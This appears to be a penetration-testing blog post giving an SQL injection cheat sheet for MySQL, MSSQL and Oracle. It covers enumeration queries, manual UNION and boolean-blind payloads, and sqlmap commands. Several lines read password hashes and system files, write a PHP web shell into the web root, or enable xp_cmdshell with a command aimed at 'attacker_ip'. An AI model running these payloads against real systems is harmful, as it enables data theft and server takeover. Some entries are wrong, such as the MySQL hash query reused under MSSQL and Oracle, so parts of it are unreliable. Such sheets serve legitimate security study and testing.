JA

web-pentest

SQL Injection Cheat Sheet

Here is the sql injection cheat sheet for MYSQL, MSSQL, POSTGRES, and ORACLE.

Sep 9, 2021·4 min read·By Jobyer Ahmed

Enumeration

Gather some juicy info to move to higher privileges

MySQL

InformationSQL Query
Database Versionselect @@version
Current Databaseselect database()
Get other databases nameselect schema_name from information_schema.schemata
Database Userselect user()
select system_user()
Database user, password hashesselect host, user, password from mysql.user
Tables Nameselect table_schema,table_name from information_schema.tables
select table_name from information_schema.tables where table_schema='userdb'
Columns Nameselect table_name, column_name **from** information_schema.columns
select column_name **from** information_schema.columns where table_name = 'usertable'
Read system Filesselect load_file('/etc/hosts')
Write to Fileselect "<?php system($_GET['cmd']); ?>",2,3,4 into outfile '/var/www/html/legit.php'

MSSQL

InformationSQL Query
Database Versionselect @@version;
Current Databaseselect db_name();
Get available databases nameselect name from master..sysdatabases;
If DBASELECT is_srvrolemember('sysadmin');
Database user, password hashesselect host, user, password from mysql.user;
Tables Nameselect table_schema,table_name from information_schema.tables;
select table_name from information_schema.tables where table_schema='userdb';
Columns Nameselect table_name, column_name **from** information_schema.columns;
select column_name **from** information_schema.columns where table_name = 'usertable';
XP_CMDSHELLsp_configure 'show advanced options', 1;RECONFIGURE;GO
sp_configure 'xp_cmdshell', 1;RECONFIGURE;GO
EXEC xp_cmdshell 'ping attacker_ip'

Oracle

InformationSQL Query
Database VersionSELECT banner FROM v$version;
SELECT version FROM v$instance;
Current DatabaseSELECT SYS.DATABASE_NAME FROM DUAL;
SELECT instance_name FROM V$INSTANCE;
Get available databases nameSELECT DISTINCT owner FROM all_tables;
Get DBA AccountsSELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';
Database user, password hashesselect host, user, password from mysql.user;
Tables NameSELECT table_name FROM all_tables;
SELECT table_name FROM all_tables WHERE owner='web_db';
Columns NameSELECT column_name FROM all_tab_columns WHERE table_name = 'users' and owner='web_db';

Exploitation

Understanding Manual attack is required instead of using a tool blindly. If we don't understand manual attack then we won't be able to find out why a tool not working and how to do it manually when required.

MySQL Error Based Manual Example

#Find how many columns
id=1 order by 1 #No Error
id=1 order by 2 #No Error
id=1 order by 3 #No Error
id=1 order by 1 # Error

#Find vulnerable column
id=1 union select null,2,3 #Error
id=1 union select 1,null,3 #### No Error

#Get Table name
id=1 union select 1,table_name,3 from information_schema.tables

#Get Columns name from a table
id=1 union select 1,column_name,3 from information_schema.columns where table_name = 'users'

#Get contents from columns
id=1 union select 1,concat(username,0x3a,password),3 FROM users

Bolean based Blind SQL Injection

#Verify
id=1 AND '1'='1 #Load Normally
id=1 AND '1'='2 #If the site vulnerable page won't load normally

#Check if the table name start with 'a'. If it is true page will load normally.
id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = a

id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = b

SQLMAP

Sqlmap is a powerful popular tool to exploit sql injection. This tool can exploit All possible SQL Injection vulnerability.

#Capture the request using burp suite and save to a file called post.txt, then:
sqlmap -r post.txt --technique E --threads 5 --current-db --dmbs=mysql

#Find tables
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database --tables

#Find Columns
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database -T users --columns

#Dump contents
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database -T Users --sql-query="select username,password from users"

Reference:

https://sqlwiki.netspi.com/attackQueries/informationGathering/

https://portswigger.net/web-security/sql-injection/cheat-sheet